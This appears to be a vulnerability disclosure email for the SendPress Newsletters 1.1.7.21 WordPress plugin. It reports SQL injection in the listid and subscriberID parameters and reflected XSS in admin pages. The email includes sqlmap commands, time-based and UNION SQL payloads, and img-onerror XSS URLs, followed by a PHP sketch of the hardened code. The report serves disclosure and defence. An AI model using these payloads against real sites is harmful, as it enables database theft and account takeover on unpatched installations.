Subject: SQL injections and XSS in SendPress Newsletters 1.1.7.21
Date: Thu, 23 Jul 2015 18:03:38 +0200

Hello,

Plugin: SendPress Newsletters 1.1.7.21 https://wordpress.org/plugins/sendpress/

Authenticated administrators can execute arbitrary SQL commands and/or inject HTML/JavaScript; since there is no CSRF protection, these requests can also be triggered on a logged-in administrator's behalf.

1. SQL injection (emails_in_queue())

Method: GET
URL: http://localhost/wp-admin/admin.php?page=sp-queue&listid=1[sqli]
Vulnerable parameter: listid

Example PHP callstack:
SendPress_Data::emails_in_queue   [/sendpress/classes/class-sendpress-data.php:166]
wpdb::get_var

Verification:
sqlmap --cookie "..." --dbms mysql -u "http://localhost/wp-admin/admin.php?page=sp-queue&listid=1" -p listid

...
Parameter: listid (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: page=sp-queue&listid=1 AND (SELECT * FROM (SELECT(SLEEP(5)))OmFG)

    Type: UNION query
    Title: Generic UNION query (NULL) - 16 columns
    Payload: page=sp-queue&listid=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178626271,0x68575a4a56696a427479,0x7178717a71),NULL,NULL,NULL,NULL,NULL,NULL-- 
...


2. SQL injection (get_subscriber())

Method: GET
URL: http://localhost/wp-admin/admin.php?page=sp-subscribers&view=subscriber&subscriberID=[sqli]&listID=1
Vulnerable parameter: subscriberID

Example PHP callstack:
SendPress_Data::get_subscriber   [/sendpress/classes/class-sendpress-data.php:1078]
SendPress_Data::wpdbQuery   [/sendpress/classes/class-sendpress-data.php:51]
wpdb::get_row

Verification:

sqlmap --cookie "" --dbms mysql -u "http://localhost/wp-admin/admin.php?page=sp-subscribers&view=subscriber&subscriberID=1&listID=1" -p subscriberID

...
Parameter: subscriberID (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: page=sp-subscribers&view=subscriber&subscriberID=1 AND (SELECT * FROM (SELECT(SLEEP(5)))LTHy)&listID=1

http://localhost/wp-admin/admin.php?page=sp-subscribers&view=subscriber&subscriberID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11&listId=1


3. XSS

Method: GET
URL: http://localhost/wp-admin/admin.php?page=sp-subscribers&view=subscriber&subscriberID=xss1&listID=xss2
Vulnerable parameters: listID, subscriberID

Verification:

http://localhost/wp-admin/admin.php?page=sp-subscribers&view=subscriber&subscriberID=1&listID=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E

http://localhost/wp-admin/admin.php?page=sp-subscribers&view=subscriber&subscriberID=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&listID=1
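For reference, an added sketch (not SendPress code, which is not reproduced here) of the pattern behind all three findings and its hardened form: integer identifiers coerced with absint() and bound through $wpdb->prepare(), values reflected into the page escaped with esc_attr()/esc_html(), and the admin page tied to a nonce so the GET request cannot be forged. Function names, the table name and the nonce action are assumptions.

```php
<?php
// Illustrative sketch with assumed names; not the plugin's own code.
// Vulnerable pattern: a GET parameter interpolated straight into SQL.
function sp_emails_in_queue_vulnerable( $listid ) {
    global $wpdb;
    // $listid arrives from $_GET['listid'] untouched -> SQL injection.
    return $wpdb->get_var(
        "SELECT COUNT(*) FROM {$wpdb->prefix}sendpress_queue WHERE listID = $listid"
    );
}

// Hardened pattern: coerce to int, then still bind via prepare() so the
// query shape is fixed regardless of what the caller passes in.
function sp_emails_in_queue_fixed( $listid ) {
    global $wpdb;
    $listid = absint( $listid );
    return (int) $wpdb->get_var( $wpdb->prepare(
        "SELECT COUNT(*) FROM {$wpdb->prefix}sendpress_queue WHERE listID = %d",
        $listid
    ) );
}

// Admin page handler: CSRF check, capability check, input coercion,
// and escaping on output.
function sp_render_subscriber_page() {
    // Rejects requests without a valid nonce for this action (CSRF).
    check_admin_referer( 'sp-subscriber-view' );
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges.' );
    }
    $subscriber_id = isset( $_GET['subscriberID'] ) ? absint( $_GET['subscriberID'] ) : 0;
    $list_id       = isset( $_GET['listID'] ) ? absint( $_GET['listID'] ) : 0;

    // Anything reflected into markup is escaped for its context.
    printf(
        '<input type="hidden" name="subscriberID" value="%s">',
        esc_attr( $subscriber_id )
    );
    printf(
        '<p>Emails queued for list %s: %d</p>',
        esc_html( $list_id ),
        sp_emails_in_queue_fixed( $list_id )
    );
}
```

Links to the page must then be generated with wp_nonce_url() using the same action name, otherwise check_admin_referer() rejects legitimate visits too.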